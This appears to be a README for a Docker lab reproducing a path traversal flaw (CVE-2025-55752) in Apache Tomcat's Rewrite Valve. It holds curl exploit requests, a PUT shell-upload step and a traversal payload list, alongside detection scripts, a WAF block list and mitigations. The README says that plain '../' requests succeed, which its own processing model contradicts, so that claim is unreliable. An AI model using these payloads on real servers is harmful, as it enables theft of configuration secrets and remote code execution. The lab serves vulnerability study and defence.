## https://sploitus.com/exploit?id=15D49EBD-32BD-5AB7-9ADD-BCAC1D1A029B
# CVE-2025-55752: Apache Tomcat Path Traversal Vulnerability

A comprehensive Docker-based reproduction environment for **CVE-2025-55752**, a critical path traversal vulnerability affecting Apache Tomcat.

## Overview

CVE-2025-55752 is a path traversal vulnerability in Apache Tomcat caused by a regression in the fix for bug 60013. The vulnerability allows attackers to bypass security constraints protecting sensitive directories like `/WEB-INF/` and `/META-INF/` through careful URI manipulation when Rewrite rules are enabled.

### Vulnerability Characteristics

- **CVE ID**: CVE-2025-55752
- **CVSS v3.1 Score**: 7.5 (HIGH)
- **CWE**: CWE-22 (Path Traversal)
- **Affected Component**: Apache Tomcat Rewrite Valve
- **Discovery Date**: October 27, 2025
- **Discoverer**: Chumy Tsai, CyCraft Technology

## Affected Versions

| Tomcat Series | Affected Versions | Patched Version |
|---------------|------------------|-----------------|
| 11.x | 11.0.0-M1 to 11.0.10 | 11.0.11+ |
| 10.1.x | 10.1.0-M1 to 10.1.44 | 10.1.45+ |
| 9.0.x | 9.0.0-M11 to 9.0.108 | 9.0.109+ |
| 8.5.x | 8.5.6 to 8.5.100 | (EOL - No patched version) |

## Technical Details

### Root Cause

The vulnerability stems from a regression in the fix for bug 60013, where URL normalization occurs **before** URL decoding. This processing order allows attackers to craft specially formatted URIs that bypass security constraints:

```
Normal Flow: Decode → Normalize → Security Check
Vulnerable Flow: Normalize → Decode → Security Check (WRONG)
```

When the Rewrite Valve processes such a URI, the sequence is:
1. The attacker crafts a URI containing (encoded) path traversal sequences
2. The normalization step runs first and strips only the traversal syntax it can see at that point
3. The decoding step then turns the encoded sequences into ordinary `..` path components
4. The security checks, which run last, fail to detect the traversal

### Attack Requirements

The vulnerability requires **at least one** of the following conditions:

1. **Rewrite Valve enabled** with URI manipulation rules
   ```xml
   <!-- in context.xml -->
   <Valve className="org.apache.catalina.valves.rewrite.RewriteValve" />
   ```

2. **Path traversal patterns** in rewrite rules
   ```
   RewriteRule ^/api/(.*)$ /handler.jsp?path=$1 [L]
   ```

3. **(Optional) PUT method enabled** for increased severity
   ```xml
   <!-- init-param on the DefaultServlet definition in web.xml -->
   <init-param>
     <param-name>readonly</param-name>
     <param-value>false</param-value>
   </init-param>
   ```

### Exploitation Scenarios

#### Scenario 1: Information Disclosure
Access sensitive configuration files:
```bash
curl http://target:8080/api/../WEB-INF/web.xml
curl http://target:8080/api/..%2fMETA-INF%2fMANIFEST.MF
```

**Result**: Configuration files exposed containing:
- Database credentials
- API keys and secrets
- Authentication mechanisms
- Class paths and application structure

#### Scenario 2: Remote Code Execution (with PUT enabled)
```bash
# Upload malicious JSP
curl -X PUT \
  -d '' \
  http://target:8080/api/../WEB-INF/shell.jsp

# Execute uploaded JSP
curl http://target:8080/WEB-INF/shell.jsp
```

**Result**: Full system compromise through arbitrary command execution

## Quick Start

### Prerequisites

- Docker and Docker Compose
- curl or similar HTTP client
- Python 3.7+ (for exploitation scripts)

### Running the Vulnerable Environment

```bash
# Clone repository
git clone https://ghe.misosiru.io/masahiro331/CVE-2025-55752.git
cd CVE-2025-55752

# Start vulnerable Tomcat
docker-compose up -d

# Verify it's running
curl http://localhost:8080

# View logs
docker-compose logs -f vulnerable-tomcat
```

### Testing the Vulnerability

#### Method 1: Using Provided Shell Script

```bash
# Run comprehensive test suite
bash docker/scripts/test_vulnerability.sh http://localhost:8080

# Results are saved in ./results directory
ls -la results/
```

#### Method 2: Using Python Exploit Script

```bash
# Install requirements
pip install requests urllib3

# Run exploit
python3 docker/scripts/exploit.py --url http://localhost:8080

# Save results to JSON
python3 docker/scripts/exploit.py --url http://localhost:8080 --output results.json
```

#### Method 3: Manual Testing with curl

```bash
# Test basic path traversal
curl -v http://localhost:8080/api/../WEB-INF/web.xml

# Test URL-encoded traversal
curl -v http://localhost:8080/api/..%2fWEB-INF%2fweb.xml

# Test with PUT method
curl -X PUT \
  -d "malicious content" \
  http://localhost:8080/api/../WEB-INF/test.jsp
```

## Payload Examples

### Path Traversal Variations

```
Basic traversal:
  /api/../WEB-INF/web.xml

URL-encoded:
  /api/..%2fWEB-INF%2fweb.xml

Double-encoded:
  /api/%252e%252e%252fWEB-INF%252fweb.xml

Multiple traversals:
  /api/../../WEB-INF/web.xml

Alternative separators:
  /api/..;/WEB-INF/web.xml
  /api/..%3fWEB-INF%3fweb.xml

Case manipulation:
  /api/..%2FWEB-INF%2Fweb.xml

Null byte injection:
  /api/..%00/WEB-INF/web.xml
```

### RCE Payload (when PUT is enabled)

```java
<%-- JSP payload omitted --%>
```

## Environment Structure

```
CVE-2025-55752/
├── docker/
│   ├── Dockerfile                     # Vulnerable Tomcat 10.1.44
│   ├── tomcat/
│   │   ├── conf/
│   │   │   ├── context.xml            # Rewrite Valve configuration
│   │   │   └── rewrite.config         # URL rewrite rules
│   │   ├── webapps/
│   │   │   └── ROOT/
│   │   │       ├── index.jsp          # Landing page
│   │   │       ├── handler.jsp        # Request analysis page
│   │   │       └── WEB-INF/web.xml    # Protected configuration
│   │   └── logs/                      # Tomcat logs
│   └── scripts/
│       ├── test_vulnerability.sh      # Bash test suite
│       └── exploit.py                 # Python exploitation toolkit
├── docker-compose.yml                 # Docker Compose configuration
└── README.md                          # This file
```

## Understanding the Vulnerability

### Configuration Files Explained

#### context.xml
Enables the Rewrite Valve which is necessary to trigger the vulnerability:
```xml
<Context>
  <!-- RewriteValve reads its rules from conf/rewrite.config -->
  <Valve className="org.apache.catalina.valves.rewrite.RewriteValve" />
</Context>
```

#### rewrite.config
Defines rewrite rules that process URI parameters:
```
RewriteRule ^/api/(.*)$ /handler.jsp?path=$1 [L]
```

This rule captures everything after `/api/` and passes it as a `path` parameter.

#### web.xml
- Enables PUT method (`readonly=false`)
- Defines security constraints for WEB-INF
- Configures JSP handling

### Why It's Vulnerable

1. **URL comes in**: `/api/../WEB-INF/web.xml`
2. **Rewrite rule matches**: Captures `../WEB-INF/web.xml`
3. **URL is normalized** (BEFORE decoding in vulnerable version)
   - Normalization tries to remove `..` sequences
   - But URL encoding interferes with this process
4. **URL is decoded**
   - If properly encoded, traversal sequences survive
5. **Security constraint check** (now too late)
   - Path appears safe after decoding
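To make the processing-order point concrete, here is an added Python model (not code from the repository) of the two pipelines, with a toy normalizer and constraint check standing in for Tomcat's own. It shows that, when normalization runs before decoding, an encoded `..` reaches the constraint check uncollapsed, while a plain `../` is collapsed in either order.

```python
from urllib.parse import unquote

# Directories the security constraint protects (the page's /WEB-INF/ and /META-INF/).
PROTECTED_PREFIXES = ("/WEB-INF/", "/META-INF/")


def normalize(path: str) -> str:
    """Collapse '.' and '..' segments of a path.

    Simplified stand-in for a URI normalizer (assumption, not Tomcat's code):
    it only understands a literal '..' segment, which is why the order
    relative to percent-decoding matters.
    """
    out = []
    for seg in path.split("/"):
        if seg == "..":
            if out:
                out.pop()
        elif seg not in ("", "."):
            out.append(seg)
    return "/" + "/".join(out)


def is_protected(path: str) -> bool:
    """Constraint check as a case-insensitive prefix match on the path it is handed."""
    return any(path.upper().startswith(p) for p in PROTECTED_PREFIXES)


def vulnerable_pipeline(uri: str) -> str:
    """Regressed order described above: normalize first, decode second."""
    return unquote(normalize(uri))


def fixed_pipeline(uri: str) -> str:
    """Correct order: decode first so the normalizer sees the real segments."""
    return normalize(unquote(uri))


def check(uri: str, pipeline) -> tuple:
    """Return (status, path_seen): 403 if the path the constraint check sees
    is protected, else 200 (constructed outcome). A 200 with '..' still in
    path_seen is the bypass: the container resolves it after the check."""
    path = pipeline(uri)
    return (403 if is_protected(path) else 200, path)


if __name__ == "__main__":
    for uri in ("/api/../WEB-INF/web.xml", "/api/..%2fWEB-INF%2fweb.xml",
                "/api/%2e%2e/WEB-INF/web.xml"):
        print(uri, "vulnerable:", check(uri, vulnerable_pipeline),
              "fixed:", check(uri, fixed_pipeline))
```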

## Detection and Diagnosis

### Check if You're Vulnerable

```bash
# 1. Check Tomcat version (bin/version.sh prints "Server version: Apache Tomcat/x.y.z")
docker exec cve-2025-55752-tomcat bin/version.sh | grep -i "server version"

# 2. Check if Rewrite Valve is enabled
docker exec cve-2025-55752-tomcat grep -r "RewriteValve" conf/

# 3. Check for rewrite rules
docker exec cve-2025-55752-tomcat find conf/ -name "*.config" -o -name "*.xml"

# 4. Test path traversal
# --path-as-is stops curl from collapsing "../" client-side before the request is sent
curl -I --path-as-is http://localhost:8080/api/../WEB-INF/web.xml
# If Status 200: VULNERABLE
# If Status 403/404: Potentially protected
```

### Log Analysis

```bash
# View Tomcat error logs
docker-compose logs vulnerable-tomcat

# Check for suspicious requests
docker exec cve-2025-55752-tomcat tail -f logs/localhost.log
```
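Added detection example (not part of the repository): it scans Tomcat access-log lines (the AccessLogValve's common pattern is assumed, and the lines below are constructed) for requests that, once fully percent-decoded, contain `..` and point at `/WEB-INF/` or `/META-INF/`, so the double-encoded and `..;/` variants from the payload list above are flagged as well as the plain `..%2f` form.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Tomcat's common access-log pattern (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [27/Oct/2025:10:00:01 +0000] "GET /index.jsp HTTP/1.1" 200 512
10.0.0.9 - - [27/Oct/2025:10:00:02 +0000] "GET /api/..%2fWEB-INF%2fweb.xml HTTP/1.1" 200 1043
10.0.0.9 - - [27/Oct/2025:10:00:03 +0000] "GET /api/%252e%252e%252fWEB-INF%252fweb.xml HTTP/1.1" 200 1043
10.0.0.9 - - [27/Oct/2025:10:00:04 +0000] "PUT /api/..%2fWEB-INF%2ftest.jsp HTTP/1.1" 201 0
10.0.0.7 - - [27/Oct/2025:10:00:05 +0000] "GET /api/users/42 HTTP/1.1" 200 88
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
PROTECTED = ("/WEB-INF/", "/META-INF/")


def fully_decode(uri: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding so double-encoded variants are seen too."""
    for _ in range(rounds):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri


def is_traversal_attempt(uri: str) -> bool:
    """True when the decoded URI both contains '..' and names a protected directory."""
    decoded = fully_decode(uri).upper()
    return ".." in decoded and any(p in decoded for p in PROTECTED)


def find_suspicious(log_text: str) -> list:
    """Return one record per suspicious request; 'succeeded' marks a 2xx answer,
    which on a vulnerable server means the constraint was actually bypassed."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m and is_traversal_attempt(m["uri"]):
            status = int(m["status"])
            hits.append({"method": m["method"], "uri": m["uri"],
                         "status": status, "succeeded": status in (200, 201, 204)})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit)
```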

## Mitigation Strategies

### Immediate Actions (Before Patching)

1. **Disable Rewrite Valve** if not essential
   ```xml
   <!-- in context.xml: comment out (or delete) the Valve element
   <Valve className="org.apache.catalina.valves.rewrite.RewriteValve" />
   -->
   ```

2. **Disable PUT method** if not needed
   ```xml
   <!-- init-param on the DefaultServlet definition in web.xml -->
   <init-param>
     <param-name>readonly</param-name>
     <param-value>true</param-value>
   </init-param>
   ```

3. **Implement Web Application Firewall (WAF) rules**
   ```
   Block requests containing: ../, ..%2f, %2e%2e
   ```

4. **Enable security constraints** on sensitive paths
   ```xml
   <security-constraint>
     <web-resource-collection>
       <web-resource-name>Protected</web-resource-name>
       <url-pattern>/WEB-INF/*</url-pattern>
     </web-resource-collection>
     <!-- empty auth-constraint: no role is allowed, so every request is denied -->
     <auth-constraint />
   </security-constraint>
   ```

### Long-term Solution (Patching)

Upgrade to patched versions:
```bash
# For Tomcat 11.x
docker pull tomcat:11.0.11

# For Tomcat 10.1.x
docker pull tomcat:10.1.45

# For Tomcat 9.0.x
docker pull tomcat:9.0.109
```

## Testing Verification

### Expected Vulnerable Behavior

When the environment is properly configured:

1. **Normal JSP files are accessible** (Status 200)
   ```
   GET /index.jsp → 200 OK
   ```

2. **WEB-INF is normally protected** (Status 403)
   ```
   GET /WEB-INF/web.xml → 403 Forbidden
   ```

3. **BUT via path traversal it's accessible** (Status 200)
   ```
   GET /api/../WEB-INF/web.xml → 200 OK (VULNERABLE!)
   ```

4. **PUT method returns appropriate status** (201/204 or 405)
   ```
   PUT /api/test.jsp → 201 Created (if PUT enabled)
   ```

## File Descriptions

### JSP Pages

- **index.jsp**: Landing page with vulnerability overview and test endpoints
- **handler.jsp**: Displays request analysis including URI, parameters, and headers
- **WEB-INF/web.xml**: Protected configuration file (demonstrative content)

### Scripts

- **test_vulnerability.sh**: Bash script running 10 different path traversal tests
- **exploit.py**: Python framework for systematic vulnerability assessment

### Configuration Files

- **context.xml**: Tomcat context configuration enabling Rewrite Valve
- **rewrite.config**: URL rewrite rules for path parameter handling
- **web.xml**: Web application configuration with security settings

## References

### Official Security Advisories
- [NVD - CVE-2025-55752](https://nvd.nist.gov/vuln/detail/CVE-2025-55752)
- [Apache Tomcat Security Documentation](https://tomcat.apache.org/security.html)

### Related CVEs
- CVE-2025-24813 (Tomcat RCE)
- CVE-2024-50379 (Similar traversal in other versions)

### Technical Resources
- [OWASP Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal)
- [CWE-22: Improper Limitation of a Pathname to a Restricted Directory](https://cwe.mitre.org/data/definitions/22.html)

## Cleanup

```bash
# Stop and remove containers
docker-compose down

# Remove volumes
docker-compose down -v

# Remove images
docker rmi cve-2025-55752-vulnerable-tomcat:latest
docker rmi tomcat:10.1.44
```

## Educational Use

This environment is designed for:
- Security research and education
- Penetration testing training
- Vulnerability analysis and understanding
- Security awareness programs
- CTF (Capture The Flag) challenges

**This environment should ONLY be used in:**
- Isolated testing networks
- Authorized security training
- Educational institutions
- Legitimate penetration tests with authorization

## Security Notice

**WARNING**: This repository contains intentionally vulnerable code. Do not deploy this environment in production or on public networks. Ensure proper network isolation and access controls.

## License

This project is provided for educational purposes. Refer to the LICENSE file for details.

## Contributing

Found improvements or additional payloads? Contributions are welcome!

## Disclaimer

This tool is provided for authorized security testing and educational purposes only. Unauthorized access to computer systems is illegal. Users are responsible for ensuring they have proper authorization before testing any systems.

---

**Last Updated**: October 2025

**Status**: Reproduction Environment - Fully Functional